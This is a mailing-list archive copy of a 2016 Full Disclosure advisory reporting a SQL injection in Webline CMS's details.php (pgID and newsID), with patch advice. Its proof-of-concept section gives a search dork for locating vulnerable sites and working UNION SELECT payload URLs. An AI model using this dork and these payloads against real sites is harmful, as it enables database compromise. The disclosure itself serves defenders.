lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 13 Apr 2016 12:21:23 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Webline CMS (2016Q2) - SQL Injection Vulnerability


Document Title:
===============
Webline CMS (2016Q2) - SQL Injection Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1823


Release Date:
=============
2016-04-13


Vulnerability Laboratory ID (VL-ID):
====================================
1823


Common Vulnerability Scoring System:
====================================
7.4


Product & Service Introduction:
===============================
With Webline Infosoft Pvt. Ltd.  you can have a highly professional CMS
website at a very reasonable price to have effect! In other words, if you
only have a little experience with Microsoft Word then you will be able
to handle your own site very easily and manage the contents in fact. You
need
no programming or HTML experience. The installation can be performed
with any standard web browser from anywhere in the world.

(Copy of the Homepage: http://webline.in/CMS-website-developement )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote
sql-injection vulnerability in the official Webline Content Management
System (2016Q2).


Vulnerability Disclosure Timeline:
==================================
2016-04-13: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Webline Infosoft Pvt. Ltd.
Product: Webline - Content Management System (Web-Application) 2016 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A remote sql-injection web vulnerability has been discovered in the
official Webline Content Management System (2016Q2) web-application.
The vulnerability allows remote attackers and privileged user accounts
to execute own sql commands to compromise the web-server or dbms.

The vulnerability is located in the `pgID` and `newsID`values of the
`details.php` file GET method request. Remote attackers are able to
execute own
malicious sql commands via pgID value to compromise the web-server or
connected database management system. The issue is a classic
remote sql injection vulnerability. The request method to execute is GET
and the attack vector is located on the application-side of the
active web-service.

The security risk of the sql-injection vulnerability is estimated as
medium with a cvss (common vulnerability scoring system) count of 7.4.
Exploitation of the remote sql injection web vulnerability requires no
user interaction and a low privileged web-application user account.
Successful exploitation of the remote sql injection results in database
management system, web-server and web-application compromise.

Request Method(s):
                [+] GET

Vulnerable File(s):
                [+] details.php

Vulnerable Parameter(s):
                [+] pgID
                [+] newsID


Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote
attackers without privileged web-application user account or user
interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.

Dork(s):
intext:"Powered by: Webline" inurl:.php?pgID=


PoC: Example
http://localhost:8080/details.php?pgID=offers_-18'[SQL-INJECTION
VULNERABILITY!]--+


PoC: Exploitation
http://localhost:8080/details.php?pgID=offers_-18'+union+select+1,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--+
http://localhost:8080/details.php?pgID=mn_-16'+union+select+1,2,3,4,5,@@version,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+
http://localhost:8080/details.php?newsID=-302'+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
http://localhost:8080/details.php?pgID=sb_-8'+union+select+@@version,2--+


Solution - Fix & Patch:
=======================
The vulnerability can be patched by usage of a secure prepared statement
in the details.php file GET method request.
Disallow usage of special chars and disallow invalid inputs to prevent
further sql or script code injection attacks.
Encode and parse the pgID value in the details.php file GET method
request to patch the issue finally.


Security Risk:
==============
The security risk of the remote sql-injection web vulnerability in the
web-application is estimated as high. (CVSS 7.4)


Credits & Authors:
==================
Iran Cyber Security Group - 0x3a (ICG SEC) [Iran-Cyber.Net]
[http://www.vulnerability-lab.com/show.php?user=Iran%20Cyber%20Security]
My Team: MOHAMAD-NOFOZI , root3r , sir.h4m1d , m0hamad.black , whitewolf
, mr.s4jj4d , mr.turk , 0day , pi.hack , l3gi0n, nazanin_wild and 0xdevil


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied,
including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable in
any case of damage,
including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to
break any licenses, policies, deface websites, hack into databases or
trade with stolen data.

Domains:    www.vulnerability-lab.com         - www.vuln-lab.com        
                - www.evolution-sec.com
Contact:    admin@...nerability-lab.com     -
research@...nerability-lab.com                 - admin@...lution-sec.com
Section:    magazine.vulnerability-lab.com     -
vulnerability-lab.com/contact.php                 -
evolution-sec.com/contact
Social:        twitter.com/vuln_lab        -
facebook.com/VulnerabilityLab                 -
youtube.com/user/vulnerability0lab
Feeds:        vulnerability-lab.com/rss/rss.php     -
vulnerability-lab.com/rss/rss_upcoming.php             -
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php     -
vulnerability-lab.com/list-of-bug-bounty-programs.php     -
vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory. Permission to
electronically
redistribute this alert in its unmodified form is granted. All other
rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team
& the specific
authors or managers. To record, list, modify, use or edit our material
contact (admin@ or research@...nerability-lab.com) to get a ask permission.

                    Copyright © 2016 | Vulnerability Laboratory -
[Evolution Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ